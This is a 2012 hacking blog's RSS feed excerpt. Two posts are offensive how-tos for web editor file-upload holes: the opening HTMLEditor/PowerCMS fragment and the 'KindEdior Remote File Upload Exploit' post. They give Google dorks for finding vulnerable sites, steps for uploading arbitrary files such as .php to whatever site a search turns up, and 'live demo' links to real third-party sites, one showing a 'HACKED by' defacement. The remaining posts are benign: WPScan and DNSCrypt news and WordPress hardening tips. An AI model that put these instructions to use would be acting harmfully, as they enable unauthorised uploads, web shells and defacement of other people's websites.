&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;i&gt;or&amp;nbsp;&lt;/i&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt; &lt;/blockquote&gt;&lt;blockquote&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt;Go here,&lt;i&gt; &lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt;or&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;i&gt;http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html&lt;/i&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt; Change connectors into &lt;b&gt;.php&lt;/b&gt; &lt;i&gt;(Like FCKeditor)&lt;/i&gt; and upload your file&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt;supported files:&lt;/b&gt; &lt;i&gt;.txt and .jpg&lt;/i&gt; in some site you can upload &lt;i&gt;.html and .php&lt;/i&gt; too&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt;To view you file go-to:&lt;/b&gt;&amp;nbsp;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;i&gt;&lt;b&gt;http://website/PowerCMS%20folder/files/your file here&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt;or&lt;/b&gt;&amp;nbsp;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;i&gt;&lt;b&gt;http://website/patch//PowerCMS%20folder/files/your file here&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt;Live Demo:&lt;/b&gt;&amp;nbsp;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;background-color: white; line-height: 16px;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;background-color: white; line-height: 16px;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;http://www.madhouse1.com/clients/dna/cms/HTMLEditor/editor/filemanager/connectors/uploadtest.html&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://www.madhouse1.com/PowerCMS%20folder/files/DC%281%29.txt&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;HACKED by -[D4RK_CRYST4L]-&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description><link>http://convex-coders.blogspot.com/2012/01/html-editor-file-upload-vulnerability.html</link><author>noreply@blogger.com (Convex Coders)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt2xFMAAfs7BG81nx5bDCDjoIbdQpEWYX6mYWFweU2fKsQreEBalE3lgn1_XhOToK-LU7pKdo1jP0mw_Exmfn658C6F4D4OZQTNKVl5SU-GkCD8HaSP6Xc4HVHCyb02A805YysEgUybNA/s72-c/html_key.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5995707516009947483.post-5861240188068456320</guid><pubDate>Tue, 24 Jan 2012 15:07:00 +0000</pubDate><atom:updated>2012-01-24T20:37:34.612+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security</category><category domain="http://www.blogger.com/atom/ns#">Tools</category><category domain="http://www.blogger.com/atom/ns#">Wordpress Hacking</category><title>WPScan v.1.1 is released, a WordPress Security vulnerability scanner</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgstICKpxHm9q5XOveNZgKzXqvftEQwAz7N7Gye0GMtOtAQWIo2tpgnmLDEiuUiU6KgYanhPKnBrxe0BBdO9NTOT3RbSj6azv4nMvpAmWI2BkpIIyOCBpBnYTjslZybHQCt6ucGefU6mao/s1600/wordpress-security-lock-300x300.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgstICKpxHm9q5XOveNZgKzXqvftEQwAz7N7Gye0GMtOtAQWIo2tpgnmLDEiuUiU6KgYanhPKnBrxe0BBdO9NTOT3RbSj6azv4nMvpAmWI2BkpIIyOCBpBnYTjslZybHQCt6ucGefU6mao/s200/wordpress-security-lock-300x300.png&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;“WPScan is a  WordPress  Security vulnerability scanner which checks the security of  WordPress  installations using a black box approach, written in Ruby.&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;b style=&quot;color: red;&quot;&gt;DETAILS&lt;/b&gt;&lt;ul style=&quot;text-align: justify;&quot;&gt;&lt;li&gt;Username enumeration (from author querystring and location header)&lt;/li&gt;
&lt;li&gt;Weak password cracking (multithreaded)&lt;/li&gt;
&lt;li&gt;Version enumeration (from generator meta tag and from client side files)&lt;/li&gt;
&lt;li&gt;Vulnerability enumeration (based on version)&lt;/li&gt;
&lt;li&gt;Plugin enumeration (2220 most popular by default)&lt;/li&gt;
&lt;li&gt;Plugin vulnerability enumeration (based on plugin name)&lt;/li&gt;
&lt;li&gt;Plugin enumeration list generation&lt;/li&gt;
&lt;li&gt;Other misc WordPress checks (theme name, dir listing, ...) &lt;/li&gt;
&lt;/ul&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;color: red; text-align: justify;&quot;&gt;&lt;b&gt;Change-log for WPScan v.1.1:&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;ul style=&quot;text-align: justify;&quot;&gt;&lt;li&gt;Detection for 750 more plugins.&lt;/li&gt;
&lt;li&gt;Detection for 107 new plugin vulnerabilities.&lt;/li&gt;
&lt;li&gt;Detection for 447 possible timthumb file locations.&lt;/li&gt;
&lt;li&gt;Advanced version fingerprinting implemented.&lt;/li&gt;
&lt;li&gt;Full Path Disclosure (FPD) checks.&lt;/li&gt;
&lt;li&gt;Auto updates.&lt;/li&gt;
&lt;li&gt;Progress indicators.&lt;/li&gt;
&lt;li&gt;Improved custom 404 checking.&lt;/li&gt;
&lt;li&gt;Improved plugin detection.&lt;/li&gt;
&lt;li&gt;Improved error_log checking.&lt;/li&gt;
&lt;li&gt;Lots of bugs fixed. Lots of small tweaks.&lt;/li&gt;
&lt;/ul&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://code.google.com/p/wpscan/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;Download:&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt; &lt;a href=&quot;http://code.google.com/p/wpscan/&quot;&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://convex-coders.blogspot.com/2012/01/wpscan-v11-is-released-wordpress.html</link><author>noreply@blogger.com (Convex Coders)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgstICKpxHm9q5XOveNZgKzXqvftEQwAz7N7Gye0GMtOtAQWIo2tpgnmLDEiuUiU6KgYanhPKnBrxe0BBdO9NTOT3RbSj6azv4nMvpAmWI2BkpIIyOCBpBnYTjslZybHQCt6ucGefU6mao/s72-c/wordpress-security-lock-300x300.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5995707516009947483.post-6451043035315140052</guid><pubDate>Tue, 24 Jan 2012 14:50:00 +0000</pubDate><atom:updated>2012-01-24T20:20:14.994+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tools</category><title>OpenDNS released preview of DNSCrypt Tool (Secures DNS Traffic)</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSiCprcdf0Hi6nOhCJkMgsRGLyhIw8VfiGlXKFzTi4fRJWDoAHlfeXJbXrYl9rvHZimu5hUfXy4lvwUEeeeHnPX4I0HEGMLWn6JLxEtvu5T0WOvGlgwTuW1-oyI06nbLwaSegrWzPsYo4/s1600/DNScrypt.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSiCprcdf0Hi6nOhCJkMgsRGLyhIw8VfiGlXKFzTi4fRJWDoAHlfeXJbXrYl9rvHZimu5hUfXy4lvwUEeeeHnPX4I0HEGMLWn6JLxEtvu5T0WOvGlgwTuW1-oyI06nbLwaSegrWzPsYo4/s320/DNScrypt.jpg&quot; width=&quot;228&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;OpenDNS released a preview of DNSCrypt  Tool , a piece of lightweight  software that everyone should use to   boost online privacy and  security.&amp;nbsp; It works by encrypting all DNS   traffic between the user and  OpenDNS, preventing any spying, spoofing  or  man-in-the-middle attacks.&lt;br /&gt;
&lt;br /&gt;
For now, DNSCyrpt supports only Mac platform. &lt;br /&gt;
&lt;br /&gt;
DNSCrypt works like SSL in that it wraps all DNS traffic with    encryption the same way SSL wraps all HTTP traffic, it&#39;s not the crypto    library being used.  We&#39;re using elliptical-curve cryptography, in    particular the Curve25519 eliptical curve.  The design goals are similar    to those described in the DNSCurve forwarder design.&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;color: red; text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;What about DNSSEC?  Does this eliminate the need for DNSSEC?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
No. DNSCrypt and DNSSEC are complementary.  DNSSEC does a number of   things.  First, it provides authentication. (Is the DNS record I&#39;m   getting a response for coming from the owner of the domain name I&#39;m   asking about or has it been tampered with?)  Second, DNSSEC provides a   chain of trust to help establish confidence that the answers you&#39;re   getting are verifiable.  But unfortunately, DNSSEC doesn&#39;t actually   provide encryption for DNS records, even those signed by DNSSEC.  Even   if everyone in the world used DNSSEC, the need to encrypt all DNS   traffic would not go away. Moreover, DNSSEC today represents a near-zero   percentage of overall domain names and an increasingly smaller   percentage of DNS records each day as the Internet grows.  &lt;br /&gt;
&lt;br /&gt;
That said, DNSSEC and DNSCrypt can work perfectly together.  They aren&#39;t   conflicting in any way.  Think of DNSCrypt as a wrapper around all DNS   traffic and DNSSEC as a way of signing and providing validation for a   subset of those records.  There are benefits to DNSSEC that DNSCrypt   isn&#39;t trying to address. In fact, we hope DNSSEC adoption grows so that   people can have more confidence in the entire DNS infrastructure, not   just the link between our customers and OpenDNS.&lt;br /&gt;
&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://shared.opendns.com/dnscrypt/packages/osx-client/dnscrypt-osx-client.pkg&quot; target=&quot;_blank&quot;&gt;Download DNSCrypt&lt;/a&gt; &lt;/b&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://convex-coders.blogspot.com/2012/01/opendns-released-preview-of-dnscrypt.html</link><author>noreply@blogger.com (Convex Coders)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSiCprcdf0Hi6nOhCJkMgsRGLyhIw8VfiGlXKFzTi4fRJWDoAHlfeXJbXrYl9rvHZimu5hUfXy4lvwUEeeeHnPX4I0HEGMLWn6JLxEtvu5T0WOvGlgwTuW1-oyI06nbLwaSegrWzPsYo4/s72-c/DNScrypt.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5995707516009947483.post-1711297808055285527</guid><pubDate>Sat, 21 Jan 2012 09:25:00 +0000</pubDate><atom:updated>2012-01-23T15:02:10.791+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Dark Crystal</category><category domain="http://www.blogger.com/atom/ns#">Exploit</category><category domain="http://www.blogger.com/atom/ns#">Vulnerability</category><category domain="http://www.blogger.com/atom/ns#">Website Hacking</category><title>KindEdior Remote File Upload Exploit</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJWACgeh9Ocps-A7Gu5sv6_AJZldqDmb6WS1DVO9jNw3sp5ehDxhz1Nmr2sAUtxMQ0DMOA_5vbouhuf2PRVo9AkYTK3EnZtHXg9R_9Yh_6S6d2_fyOWPA7bwUlbS386pVxFYbBb17hIco/s1600/kindeditor.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJWACgeh9Ocps-A7Gu5sv6_AJZldqDmb6WS1DVO9jNw3sp5ehDxhz1Nmr2sAUtxMQ0DMOA_5vbouhuf2PRVo9AkYTK3EnZtHXg9R_9Yh_6S6d2_fyOWPA7bwUlbS386pVxFYbBb17hIco/s200/kindeditor.jpg&quot; width=&quot;198&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt;Google Dork:&lt;/b&gt;&lt;/span&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;u&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;/u&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;intitle:index of? inurl:kindeditor&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt; inurl:examples/uploadbutton.html&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/blockquote&gt;&amp;nbsp;&lt;b&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;u&gt;&lt;b&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Exploit&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt;:&lt;/b&gt;&lt;i&gt; http://www.vulnrabewebsite.com/path/kindeditor/examples/uploadbutton.html&lt;/i&gt;&lt;/span&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Choose any website from &lt;i&gt;&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD4&quot;&gt;google search&lt;/span&gt; results&lt;/i&gt; and go-to vulnerable &lt;b&gt;URL&lt;/b&gt; like&amp;nbsp;&lt;b&gt;&lt;i&gt;http://www.vulnrabewebsite.com/kindeditor/examples/uploadbutton.html&lt;/i&gt;&lt;/b&gt; now click on upload and select your file, it will be automaticly &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD3&quot;&gt;uploaded&lt;/span&gt;,and you&#39;ll get your uploaded file &lt;b&gt;Link/URL &lt;/b&gt;there, and if you can&#39;t get your uploaded file link then go-to&amp;nbsp;&lt;i&gt;&lt;b&gt;http:// www.vulnrabewebsite.com/path/kindeditor/attached/file/&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;and you&#39;ll see alot of &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD6&quot;&gt;folders&lt;/span&gt; there, click on last &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD5&quot;&gt;folder&lt;/span&gt; and in the folder click on last file, its your uploaded file. Enjoy &amp;amp; Must leave a Comment if you want more exploit like that, because&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;new article&#39;s posting depends on old article&#39;s popularity&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt;Live Demo :&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://www.arimlab.com/themes/default/js/kindeditor/examples/uploadbutton.html&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://www.arimlab.com/themes/default/js/kindeditor/attached/file/20120121/20120121091624_88826.html&quot;&gt;http://www.arimlab.com/themes/default/js/kindeditor/attached/file/20120121/20120121091624_88826.html&lt;/a&gt;&lt;/span&gt;&lt;/i&gt; &lt;/span&gt;&lt;/div&gt;&lt;u&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;</description><link>http://convex-coders.blogspot.com/2012/01/kindedior-remote-file-upload-exploit.html</link><author>noreply@blogger.com (Convex Coders)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJWACgeh9Ocps-A7Gu5sv6_AJZldqDmb6WS1DVO9jNw3sp5ehDxhz1Nmr2sAUtxMQ0DMOA_5vbouhuf2PRVo9AkYTK3EnZtHXg9R_9Yh_6S6d2_fyOWPA7bwUlbS386pVxFYbBb17hIco/s72-c/kindeditor.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5995707516009947483.post-6092558160398340705</guid><pubDate>Fri, 20 Jan 2012 11:58:00 +0000</pubDate><atom:updated>2012-01-20T17:28:34.695+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security</category><category domain="http://www.blogger.com/atom/ns#">Tips &#39;n&#39; Tricks</category><category domain="http://www.blogger.com/atom/ns#">Tools</category><category domain="http://www.blogger.com/atom/ns#">Wordpress Hacking</category><title>43 Excellent WordPress Security Tips &amp; Plugins</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgljID7Lwut1kdKi_ggg1fvN8npk-JPOS2YMk_tOoc17uvpO417bqij8fUctc4K7n26vrIUtgFcBjvHPFF6v9V5n46d6iXmA3YTysVFxg0J5GRU4LzB4rZDzvOFIJLVt1l0yR5F9aGcC_g/s1600/wp-security1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;241&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgljID7Lwut1kdKi_ggg1fvN8npk-JPOS2YMk_tOoc17uvpO417bqij8fUctc4K7n26vrIUtgFcBjvHPFF6v9V5n46d6iXmA3YTysVFxg0J5GRU4LzB4rZDzvOFIJLVt1l0yR5F9aGcC_g/s320/wp-security1.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;After putting in all of the time, and perhaps money, into your  WordPress website or blog, its now time to secure and protect it from  outside enemies and general bad guys: hackers, spammers and all round  tossers. &lt;br /&gt;
Without a doubt, for a self-hosted blog, WordPress is the best blog  CMS that you can get. Though it comes packed with security features,  being a popular and open source software, it also means that hackers  have full access to the code which they can scrutinize to find any  exploits they can use to hack into any WordPress-enabled site.&lt;br /&gt;
On the good side, one of the best things about WordPress is its  plugin system that allows anyone to install any plugins or create your  own plugins to extend its functionality, including improving security.&lt;br /&gt;
Here, I have listed some wordpress security tips and plugins that you can use to secure WordPress blog.&lt;br /&gt;
&lt;hr /&gt; &lt;h2&gt;Security Tips&lt;/h2&gt;&lt;hr /&gt; &lt;div style=&quot;margin-top: 20px;&quot;&gt; &lt;h3&gt;&lt;strong&gt;1. Nobody should be allowed to search your entire server.&lt;/strong&gt;&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;a href=&quot;http://www.wpdesigner.com/2008/01/30/wordpress-tips-part-1/&quot;&gt;WPdesigner advices us to NOT use this search code in the search.php&lt;/a&gt;&lt;br /&gt;
&lt;code&gt;&amp;lt;?php echo $_SERVER [&#39;PHP_SELF&#39;]; ?&amp;gt;&lt;/code&gt;&lt;br /&gt;
Nobody should be allowed to search your entire server, or? Use this one instead:&lt;br /&gt;
&lt;code&gt;&amp;lt;?php bloginfo (&#39;home&#39;); ?&amp;gt;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Block WP- folders from being indexed by search engines, the best way  to block them in your robots.txt file. Add the following line to your  list:&lt;br /&gt;
&lt;code&gt;Disallow: /wp-* &lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;h3&gt;&lt;strong&gt;2. Directories should not be left open for public browsing&lt;/strong&gt;&lt;/h3&gt;There is a potential problem letting people know what plugins you  have, or what versions they are. If there is some known exploit that is  linked to a plugin, it could be easy enough for someone to use it to  their advantage. Make an empty wp-content/plugins/index.html file or  just add this line in your .htaccess file in your root:&lt;br /&gt;
&lt;code&gt;Options All -Indexes&lt;/code&gt;&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;3. Drop the version string in your Meta Tags&lt;/strong&gt;&lt;/h3&gt;A large number of WordPress themes have the WordPress Meta Tag that  show the version of WordPress that is running on your blog which is an  easy way to get your blog prone to hackers if you didn’t upgrade to the  security-enhanced file permissions on both which is pointed out by &lt;a href=&quot;http://www.mattcutts.com/blog/three-tips-to-protect-your-wordpress-installation/&quot;&gt;Matt Cutts&lt;/a&gt;. Another solution involves a plugin that sets up a secondary new version.&lt;br /&gt;
This tag is in the header.php file that displays your current version of wordpress.&lt;br /&gt;
&lt;code&gt;&amp;lt;meta content=&quot;WordPress &amp;amp;lt;?php bloginfo(’version’); ? /&amp;amp;gt;&quot; name=&quot;generator&quot; /&amp;gt;&lt;/code&gt;&lt;br /&gt;
&lt;h3&gt;4. Stay Updated&lt;/h3&gt;You need to keep your on your plugin/widget, theme, and WordPress  versions updated. Also, subscribing to the plugin/widget/theme Author’s  RSS feeds makes keeping up with them much easier.&lt;br /&gt;
&lt;h3&gt;5. Take regular backups of your site and Database&lt;/h3&gt;You always have to take regular backups of your file directories as well as the database. &lt;a href=&quot;http://www.ilfilosofo.com/blog/wp-db-backup/&quot;&gt;WordPress Database Backup plugin&lt;/a&gt; creates backups of your core WordPress tables as well as other tables of your choice in the same database.&lt;br /&gt;
&lt;h3&gt;6. Use SSH/Shell Access instead of FTP&lt;/h3&gt;If someone gets a hold of your FTP login information (which is  usually not encrypted and easy to get), they can manipulate your files  and add spam to your site without you even knowing about it! Using SSH,  everything is encrypted including the transfer of files, etc.&lt;br /&gt;
&lt;h3&gt;7. Stop worrying about your wp-config.php file&lt;/h3&gt;Keep your database username and password Safe by adding the following  to the .htaccess file at the top level of your WordPress install:&lt;br /&gt;
&lt;code&gt;&amp;lt;FilesMatch ^wp-config.php$&amp;gt;deny from all&amp;lt;/FilesMatch&amp;gt;&lt;/code&gt;&lt;br /&gt;
This will make it harder for your database username and password to fall into the wrong hands in the event of a server problem.&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;8. Block WP- folders from the Search Engines&lt;/strong&gt;&lt;/h3&gt;There is no need to have all of your filesWordpress files indexed by  Google, so it’s best to block them in your robots.txt file. Add the  following line to your list&lt;br /&gt;
&lt;code&gt;Disallow: /wp-*&lt;/code&gt;&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt; &lt;/strong&gt;&lt;strong&gt;9. Block access to WP-Admin folder using .htaccess&lt;/strong&gt;&lt;/h3&gt;There is an article written Reuben that talks about how you can &lt;a href=&quot;http://www.reubenyau.com/protecting-the-wordpress-wp-admin-folder/&quot; target=&quot;_blank&quot;&gt;protect your WordPress admin folder&lt;/a&gt;  by allowing access to it from a defined set of IP addresses. Everything  else will bring up a Forbidden error message. So if you only access  your blog from one or two places routinely, it’s worth implementing.  Also, you’re supposed to create a new .htaccess file inside your  wp-admin folder, not replace the one at the root of your blog&lt;br /&gt;
&lt;h3&gt;&lt;strong&gt;10. Don’t Use Default Passwords&lt;/strong&gt;&lt;/h3&gt;Are you still logging into your wp-admin page with the same default  password that was emailed to you? If so, CHANGE IT! You can follow the  instructions given in the article “&lt;a href=&quot;http://www.hungry-hackers.com/2009/12/hack-proof-passwords.html&quot; target=&quot;_blank&quot; title=&quot;Hack Proof Password&quot;&gt;Hack Proof Password&lt;/a&gt;” posted by us earlier to imrove the strength of your password.&lt;br /&gt;
